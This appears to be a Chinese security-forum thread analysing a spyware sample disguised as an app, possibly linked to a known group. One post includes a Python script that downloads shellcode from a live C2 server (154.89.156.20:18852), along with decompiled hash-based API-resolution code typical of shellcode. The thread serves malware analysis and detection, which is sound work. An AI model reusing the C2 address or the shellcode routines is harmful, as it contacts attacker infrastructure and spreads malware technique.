未知Spyware #FakeAPP 1X

显示全部楼层 · 发表于 2025-10-19 23:46:04

kf1123 发表于 2025-10-19 21:49
看起来像是金眼狗团伙使用的木马

@神龟Turmi @驭龙其中一个函数比对了一下，简直不能说是一模一样

https://www.secrss.com/articles/79443

显示全部楼层 · 发表于 2025-10-19 23:48:55

kf1123 发表于 2025-10-19 21:49
看起来像是金眼狗团伙使用的木马

显示全部楼层 · 发表于 2025-10-20 00:01:59

腾讯电脑管家 1X

显示全部楼层 · 发表于 2025-10-20 12:12:08

wwwab 发表于 2025-10-19 21:00
@UNknownOoo
Profiler.json GPUCache.xml GPUCache2.xml 这三个Shellcode好像特征点比较明显（尤其是前 ...

这类文件可能不在火绒的文件实时监控范围内...不过加一下也好（）

显示全部楼层 · 发表于 2025-10-20 12:40:13

本帖最后由 wwwab 于 2025-10-20 14:17 编辑

从C2 154.89.156.20:18852拉了一下Shellcode:

import socket
import time
import sys
def download_shellcode():
host = "154.89.156.20"
port = 18852
max_retries = 5
retry_delay = 3 # seconds
buffer_size = 4096
total_data = bytearray()
# 尝试连接服务器（带重试机制）
for _ in range(max_retries):
try:
with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:
s.settimeout(15)
s.connect((host, port))
# 动态接收数据
while True:
chunk = s.recv(buffer_size)
if not chunk:
break # 连接正常关闭
total_data.extend(chunk)
# 成功获取数据后退出重试循环
break
except (socket.error, socket.timeout) as e:
print(f"连接失败: {str(e)}，{retry_delay}秒后重试...")
time.sleep(retry_delay)
else:
print("错误: 超过最大重试次数，连接失败")
sys.exit(1)
return bytes(total_data)
def save_to_file(data, filename):
with open(filename, "wb") as f:
f.write(data)
print(f"已保存 {len(data)} 字节到 {filename}")
if __name__ == "__main__":
# 下载并保存shellcode
shellcode = download_shellcode()
if shellcode:
save_to_file(shellcode, "shellcode.bin")
print("分析提示:")
print("1. 使用反汇编工具分析: radare2, IDA Pro, Ghidra")
print("2. 检查网络特征: 端口 18852/TCP")
print("3. 行为分析: VirtualAlloc + 直接执行表明是自包含代码")
else:
print("未接收到有效数据")

复制代码

// positive sp value has been detected, the output may be wrong!
__int64 __fastcall sub_AE4(int a1, __int64 a2, __int64 a3, char a4)
{
__int64 v4; // rax
int v5; // r11d
__int64 v6; // r12
unsigned __int64 v7; // rdi
unsigned int v8; // eax
int v9; // esi
unsigned int v10; // ebx
__int64 v11; // rbp
int v12; // esi
unsigned __int64 v13; // rax
int v14; // ebp
__int64 v15; // rdx
int v17; // [rsp-10h] [rbp-24h]
unsigned int v18; // [rsp-Ch] [rbp-20h]
unsigned int v19; // [rsp-8h] [rbp-1Ch]
LODWORD(v4) = __readfsdword(0x30u);
LOBYTE(v4) = v4 | 0x57;
v7 = *(unsigned int *)(v4 + 12);
while ( 1 )
{
LABEL_14:
v15 = *(unsigned int *)(v7 + 24);
if ( !(_DWORD)v15 )
return 0i64;
v8 = *(_DWORD *)(v7 + 48);
v9 = 0;
v10 = *(_DWORD *)(v7 + 44);
v7 = *(unsigned int *)v7;
v18 = v7;
v11 = *(unsigned int *)(*(unsigned int *)(v15 + 60) + v15 + 120);
v19 = v11;
if ( (_DWORD)v11 )
{
if ( HIWORD(v10) )
{
do
{
v12 = __ROR4__(v9, 13);
v17 = *(char *)v8;
if ( (char)v17 < 97 )
v9 = v17 + v12;
else
v9 = *(char *)v8 - 32 + v12;
}
while ( v5 );
v7 = (unsigned int)v7;
v11 = (unsigned int)v11;
}
v13 = (unsigned int)(v15 + *(_DWORD *)(v15 + v11 + 32));
if ( *(_DWORD *)(v15 + v11 + 24) )
break;
}
}
while ( 1 )
{
v14 = 0;
do
v14 = *(char *)(unsigned int)(v15 + *(_DWORD *)v13) + __ROR4__(v14, 13);
while ( a4 );
v7 = v18;
if ( v9 + v14 == a1 )
return (unsigned int)(v15
+ *(_DWORD *)(*(_DWORD *)(v19 + v15 + 28)
+ 4 * (unsigned int)*(unsigned __int16 *)(*(unsigned int *)(v19 + v15 + 36) + v15)
+ v15));
v13 = (unsigned int)(v13 + 4);
if ( !*(_DWORD *)((char *)&loc_10 + 2 * v6) )
goto LABEL_14;
}
}

复制代码

似乎是通过哈希值动态解析API导出函数地址的函数。
目前好像也是和GPUCache2.xml差不多，当前尚未在此处投放其他载荷（没下放？）。

[病毒样本] 未知Spyware #FakeAPP 1X

本帖子中包含更多资源

评分

本帖子中包含更多资源

本帖子中包含更多资源

本帖子中包含更多资源